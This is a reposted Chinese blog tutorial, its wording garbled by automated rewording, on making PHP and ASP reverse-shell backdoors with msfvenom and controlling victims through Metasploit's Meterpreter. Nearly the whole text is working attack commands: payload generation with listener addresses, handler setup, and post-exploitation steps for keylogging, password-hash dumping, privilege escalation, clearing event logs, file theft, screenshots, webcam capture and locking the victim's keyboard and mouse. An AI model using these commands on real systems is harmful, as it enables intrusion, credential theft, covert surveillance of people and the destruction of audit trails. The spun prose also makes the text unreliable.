原文链接:https://blog.csdn.net/u012991692/article/details/807842
一 成立反弹后门
msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php
注:生成的反弹木马存放在当前用户home目录下;
将生成的木顿时传到方针机中,可以长途访谒;
windows下asp反弹木马:
[email protected]:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp > shell.asp
二 监听端口成立会话
1 使用handler模块
msf > use exploit/multi/handler
2 设置payload
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp(其时windows时php换成windows)
PAYLOAD =>php/meterpreter/reverse_tcp
3 设置监听主机
msfexploit(multi/handler) > set LHOST 192.168.88.155
LHOST =>192.168.88.155
4 设置监听端口(默认4444)
msfexploit(multi/handler) > set LPORT 4444
LPORT => 4444
5 策动打击
msfexploit(multi/handler) > exploit
注:要长途访谒你上传的后门文件
meterpreter > keyscan_start
keyscan_dump // 检察键盘记录
监控方针系统键盘输入,,遏制监控为keyscan_stop
meterpreter > migrate
将你的Meterpreter移到另一个进程
先用PS命令检察进程后,得到进程ID,然后在执行Migrate (进程ID)
meterpreter > getuid
获取用户的处事器运行
meterpreter > shell
进入方针电脑,命令提示符
meterpreter > Idletime
方针电脑闲置了多永劫间
meterpreter > Hashdump
导出对方SAM数据库里的内容,保举一个hash破解网站:
meterpreter > getsystem
操作已自缝隙,自动提权为SYSTEM
meterpreter > clearev
断根事件日志
meterpreter > execute(某Windows指令)
在对方电脑上运行该指令
meterpreter > execute
Usage: execute -f file [options]
meterpreter > download(文件路径)
下载文件命令
例如下载C盘下面的jzking121.txt文件
meterpreter > download c:\\jzking121.txt
[*] downloading: c:\jzking121.txt -> jzking121.txt
[*] downloaded : c:\jzking121.txt -> jzking121.txt
注意,文件路径中要有两个\\
Upload指令跟Download指令类似!
meterpreter > shutdown
封锁方针计算机,reboot为重启计算机
meterpreter >screenshot
获取方针电脑,屏幕截图
meterpreter > uictl enable keyboard 启用方针使用键盘
meterpreter > uictl disable mouse 禁止方针使用鼠标
enable 为启用
disable 禁用
meterpreter > webcam_list
方针系统的摄像头列表
meterpreter > webcam_snap
从指定的摄像头,拍摄照片
meterpreter > search -d c:\\ -f 1.jpg
搜索方针电脑,C盘1.jpg文件
————————————————
转载自msdn,原文链接:https://blog.csdn.net/u012991692/article/details/80784258
msf成立php反弹shell
温馨提示: 本文由Jm博客推荐,转载请保留链接: https://www.jmwww.net/file/web/29892.html